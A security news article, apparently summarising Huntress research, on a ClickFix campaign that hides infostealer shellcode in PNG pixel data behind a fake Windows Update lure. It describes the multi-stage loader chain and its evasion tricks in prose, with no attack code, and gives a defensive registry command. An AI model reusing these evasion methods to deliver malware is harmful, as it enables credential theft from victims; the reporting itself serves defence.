Cybercriminals have rapidly pivoted to a new evasion technique following Microsoft’s recent crackdown on malicious email attachments. Just weeks after Outlook began blocking inline Scalable Vector Graphics (SVG) files, attackers are now hiding malware inside the pixel data of Portable Network Graphics (PNG) images, a method known as steganography.
Security researchers at Huntress identified the shift as part of a broader “ClickFix” campaign, which uses social engineering to bypass browser protections. By embedding encrypted code within specific color channels of seemingly harmless images, threat actors can evade standard detection tools that scan for script-based threats.
Despite “Operation Endgame,” a coordinated law enforcement action targeting botnet infrastructure earlier this month, the campaign remains highly active. Active domains hosting the new PNG-based lures continue to distribute the Rhadamanthys infostealer, suggesting the group’s resilience against takedown efforts.
Promo
From Scripts to Pixels: The Steganography Shift
Attackers are abandoning or complementing XML-based SVG scripts in favor of pixel-based PNG steganography. This tactical shift correlates directly with Microsoft’s October decision to block inline SVG images in Outlook to combat phishing.
Unlike SVGs, which rely on text-based scripts easily flagged by filters, the new method hides malicious code inside the visual data of the image itself.
Employing a custom algorithm, the loader repurposes standard image data structures to conceal its payload. Describing the mechanics of the new payload delivery system, Ben Folland and Anna Pham, researchers at Huntress, explain that “the malicious code is encoded directly within the pixel data of PNG images, relying on specific colour channels to reconstruct and decrypt the payload.”
Once extracted, the payload is decrypted in memory, bypassing disk-based detection mechanisms. Such memory-only execution paths are particularly effective against Endpoint Detection and Response (EDR) systems, which primarily monitor file writes to the disk.
By keeping the malicious code ephemeral and volatile, attackers significantly reduce the window for forensic capture. Highlighting the forensic challenges posed by this technique, Huntress researchers note that “a notable discovery during analysis was the campaign’s use of steganography to conceal the final malware stages within an image.”
Finally, a .NET assembly is reflectively loaded to inject the payload into `explorer.exe`.
The ‘ClickFix’ Trap: Weaponizing User Trust
Leveraging a technique dubbed “ClickFix,” the attack mimics a legitimate Windows error or update screen. Victims are presented with a fake “Windows Update” interface that appears to stall or fail. To “fix” the issue, users are instructed to open the Windows Run dialog (Win+R) and paste a command.
Bypassing technical exploits entirely, this technique leverages a low-tech loophole in user behavior. Underscoring the low barrier to entry for this exploit, Huntress researchers highlight the simplicity of this approach.
JavaScript embedded in the lure page automatically populates the clipboard with the malicious command. Such tactics circumvent browser security controls like SmartScreen, which typically flag malicious downloads but not manual command execution.
To mitigate this specific vector, administrators can disable the Run box via the registry modification using the following command:
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
Dependence on manual user input marks this as a “human-centric” exploit rather than a technical vulnerability in Windows.
Technical Breakdown: Inside the Loader
Initiating the infection, an `mshta.exe` command is executed via the Run box. This command retrieves a remote HTA file, which then executes a PowerShell script. Upon execution, the script decrypts and loads a .NET assembly directly into memory. The Huntress technical analysis details the subsequent loading process:
“The 3rd-stage .NET assembly acts as a loader for the 4th stage, which is stored as shellcode using steganography within an embedded encrypted PNG file.”
“The C# code to facilitate shellcode injection is also stored encrypted within the .NET assembly itself and is compiled into another .NET assembly, which is reflectively loaded at runtime.”
Donut, a shellcode generation tool, executes the final payload (Rhadamanthys or LummaC2).
Analysis reveals the use of “trampoline” code with thousands of empty function calls to frustrate reverse engineering efforts. Reflective loading ensures the malware operates almost entirely in memory, leaving minimal forensic traces on the disk.
Resilience Against ‘Operation Endgame’
Despite the high-profile Operation Endgame takedowns in mid-November, the campaign remains active. Huntress researchers confirmed that multiple domains hosting the Windows Update lure are still operational.
Despite the coordinated takedowns, the threat actors have maintained a functional foothold. Confirming the infrastructure’s survival, Ben Folland and Anna Pham observe that “as of November 19, multiple active domains… continue to host the Windows Update Lure page associated with the Rhadamanthys campaign.”
Recent ESET data indicates a 500% surge in ClickFix attacks in Q4 2025, suggesting the tactic is gaining popularity among cybercriminals. Decentralization allows the botnet infrastructure to weather centralized takedown attempts.
Such persistence shows the limitations of law enforcement actions against modern, distributed malware networks. Rapid pivoting, from SVGs to PNGs, and from one C2 server to another, demonstrates high operational agility.